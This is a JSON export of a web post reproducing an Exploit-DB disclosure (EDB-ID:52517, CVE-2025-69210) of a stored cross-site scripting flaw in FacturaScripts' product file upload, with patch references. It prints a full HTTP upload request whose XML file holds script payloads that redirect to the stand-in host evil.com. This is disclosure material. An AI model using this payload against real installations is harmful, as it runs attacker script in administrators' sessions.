{"id":50098,"date":"2026-04-29T04:40:43","date_gmt":"2026-04-29T04:40:43","guid":{"rendered":"http:\/\/localhost\/?p=50098"},"modified":"2026-04-29T04:40:43","modified_gmt":"2026-04-29T04:40:43","slug":"facturascripts-202543-xss","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50098","title":{"rendered":"FacturaScripts 2025.43 &#8211; XSS_EDB-ID:52517"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T09:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: FacturaScripts 2025.43 &#8211; XSS Date: 30-12-2025 Exploit Author: VETTRIVEL U Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006 Vendor Homepage: https:\/\/facturascripts.com\/ Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;FacturaScripts 2025.43 &#8211; XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52517&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69210&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: FacturaScripts 2025.43 &#8211; XSS\\r\\n# Date: 30-12-2025\\r\\n# Exploit Author: VETTRIVEL U \\r\\n# Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006\\r\\n# Vendor Homepage: https:\/\/facturascripts.com\/\\r\\n# Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts\\r\\n# Affected Versions: \\u003c= 2025.4, = 2025.11, = 2025.41, = 2025.43\\r\\n# Fixes: https:\/\/github.com\/NeoRazorX\/facturascripts\/commit\/e908ade21c84bdc9d51190057482316730c66146\\r\\n# Patched Releases: https:\/\/github.com\/NeoRazorX\/facturascripts\/releases\/tag\/v2025.7\\r\\n# Tested on: Windows\\r\\n# GitHub Advisories: https:\/\/github.com\/advisories\/GHSA-2267-xqcf-gw2m\\r\\n# CVE Reference: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-69210\\r\\n# CVE: CVE-2025-69210\\r\\n\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n\\r\\n\\r\\n## Description\\r\\n\\r\\nA stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality.\\r\\nAuthenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed.\\r\\nBecause product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator\u2019s browser session.\\r\\n\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n\\r\\n## Steps to Reproduce\\r\\n\\r\\n1. Log in as a normal user.\\r\\n2. Navigate to the Warehouse \u2192 Products section:\\r\\n   \\r\\n   \\thttp:\/\/localhost:8888\/ListProducto\\r\\n\\r\\n3. Click New Product, enter the details (Example below), and save:\\r\\n\\r\\n\\r\\n\\tProduct Reference: XSS POC\\r\\n\\tDescription: Stored XSS PoC\\r\\n\\r\\n\\r\\n4. Go to the Files section of the product.\\r\\n5. Upload a crafted XML file containing JavaScript OR intercept the upload request using Burp Suite.\\r\\n6. Modify the intercepted request body and inject the following payload as the uploaded XML file:\\r\\n\\r\\n\\r\\nPOST \/EditProducto?code=10 HTTP\/1.1\\r\\nHost: localhost:8888\\r\\nContent-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundaryPU65l8Am0L64rWdo\\r\\nCookie: [authenticated session cookies]\\r\\n&#8212;&#8212;\\r\\n&#8212;&#8212;WebKitFormBoundaryPU65l8Am0L64rWdo\\r\\nContent-Disposition: form-data; name=\\&#8221;new-files[]\\&#8221;; filename=\\&#8221;xss.xml\\&#8221;\\r\\nContent-Type: text\/xml\\r\\n\\u003chtml\\u003e\\r\\n   \\u003chead\\u003e\\u003c\/head\\u003e\\r\\n   \\u003cbody\\u003e\\r\\n      \\u003csomething:script xmlns:something=\\&#8221;\\r\\n      \\u003csomething:script xmlns:something=\\&#8221;http:\/\/www.w3.org\/1999\/xhtml\\&#8221;\\u003e\\r\\n         alert(\\&#8221;XSS\\&#8221;);\\r\\n         if (confirm(\\&#8221;Now Redirect POC\\&#8221;)) {\\r\\n         top.location.href = \\&#8221;https:\/\/evil.com\\&#8221;;\\r\\n         }\\r\\n      \\u003c\/something:script\\u003e\\r\\n      \\u003ca:script xmlns:a=\\&#8221;\\r\\n      \\u003ca:script xmlns:a=\\&#8221;http:\/\/www.w3.org\/1999\/xhtml\\&#8221;\\u003e\\r\\n         alert(\\&#8221;XSS\\&#8221;);\\r\\n         if (confirm(\\&#8221;Now Redirect POC\\&#8221;)) {\\r\\n         location.href = \\&#8221;https:\/\/evil.com\\&#8221;;\\r\\n         }\\r\\n      \\u003c\/a:script\\u003e\\r\\n      \\u003cinfo\\u003e\\r\\n         \\u003cname\\u003e\\r\\n            \\u003cvalue\\u003e\\r\\n               \\u003c![CDATA[\\r\\n                  \\u003cscript\\u003e\\r\\n                  alert(\\&#8221;XSS\\&#8221;);\\r\\n                  if (confirm(\\&#8221;Now Redirect POC\\&#8221;)) {\\r\\n                  window.location = \\&#8221;https:\/\/evil.com\\&#8221;;\\r\\n                  }\\r\\n                  \\u003c\/script\\u003e\\r\\n                  ]]\\u003e\\r\\n            \\u003c\/value\\u003e\\r\\n         \\u003c\/name\\u003e\\r\\n         \\u003cdescription\\u003e\\r\\n            \\u003cvalue\\u003eHello\\u003c\/value\\u003e\\r\\n         \\u003c\/description\\u003e\\r\\n         \\u003curl\\u003e\\r\\n            \\u003cvalue\\u003ehttp:\/\/google.com\\u003c\/value\\u003e\\r\\n         \\u003c\/url\\u003e\\r\\n      \\u003c\/info\\u003e\\r\\n   \\u003c\/body\\u003e\\r\\n\\u003c\/html\\u003e\\r\\n&#8212;&#8212;\\r\\n&#8212;&#8212;WebKitFormBoundaryPU65l8Am0L64rWdo&#8211;\\r\\n\\r\\n\\r\\n6. Forward the request and save the product file.\\r\\n7. Open the uploaded file using the generated file URL, for example:\\r\\n\\r\\n\\r\\n\\thttp:\/\/localhost:8888\/MyFiles\/2025\/12\/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9\\r\\n\\r\\n\\r\\nObserve that:\\r\\nA popup with the message \u201cXSS\u201d is displayed.\\r\\nUpon clicking OK, the browser redirects to an attacker-controlled domain.\\r\\n\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n\\r\\n## Impact\\r\\n- Arbitrary JavaScript execution in the victim\u2019s browser.\\r\\n- Products created by normal users are visible to administrators. When an admin opens the malicious file, the payload executes in the admin\u2019s session.\\r\\n- Phishing \\u0026 Redirect Abuse: Attackers can redirect victims to malicious domains.\\r\\n- If extended, this vulnerability could be chained with:\\r\\n    &#8211; Session hijacking\\r\\n    &#8211; CSRF token theft\\r\\n    &#8211; Admin API abuse\\r\\n\\r\\n- Trust Boundary Violation: User-controlled XML content is rendered as active content without sanitization.\\r\\n\\r\\n## Reference\\r\\n\\r\\nhttps:\/\/github.com\/vettrivel007\/CVE-Disclosures\/blob\/main\/CVE-2025-69210.md\\r\\nhttps:\/\/github.com\/advisories\/GHSA-2267-xqcf-gw2m\\r\\n\\r\\n\\r\\n## Author Details: \\r\\n\\r\\nExploit Author: VETTRIVEL U \\r\\nAuthor Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006\\r\\nGitHub Profile: https:\/\/github.com\/vettrivel007\/&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52517&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:5.4,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:L\/I:L\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52517&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T09:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: FacturaScripts 2025.43 &#8211; XSS Date: 30-12-2025 Exploit Author: VETTRIVEL U Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006 Vendor Homepage: https:\/\/facturascripts.com\/ Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;FacturaScripts 2025.43 &#8211; XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52517&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69210&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,82,12,40,21,13,7,11,5],"class_list":["post-50098","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-54","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50098\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-29T09:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: FacturaScripts 2025.43 &#8211; XSS Date: 30-12-2025 Exploit Author: VETTRIVEL U Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006 Vendor Homepage: https:\/\/facturascripts.com\/ Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;FacturaScripts 2025.43 &#8211; XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52517&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69210&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50098\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T04:40:43+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"FacturaScripts 2025.43 &#8211; XSS_EDB-ID:52517\",\"datePublished\":\"2026-04-29T04:40:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\"},\"wordCount\":1016,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.4\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\",\"name\":\"FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T04:40:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"FacturaScripts 2025.43 &#8211; XSS_EDB-ID:52517\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50098","og_locale":"en_US","og_type":"article","og_title":"FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-29T09:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: FacturaScripts 2025.43 &#8211; XSS Date: 30-12-2025 Exploit Author: VETTRIVEL U Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006 Vendor Homepage: https:\/\/facturascripts.com\/ Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;FacturaScripts 2025.43 &#8211; XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52517&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69210&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit...","og_url":"https:\/\/zero.redgem.net\/?p=50098","og_site_name":"zero redgem","article_published_time":"2026-04-29T04:40:43+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50098#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50098"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"FacturaScripts 2025.43 &#8211; XSS_EDB-ID:52517","datePublished":"2026-04-29T04:40:43+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50098"},"wordCount":1016,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-5.4","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50098#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50098","url":"https:\/\/zero.redgem.net\/?p=50098","name":"FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-29T04:40:43+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50098#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50098"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50098#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"FacturaScripts 2025.43 &#8211; XSS_EDB-ID:52517"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50098"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50098\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}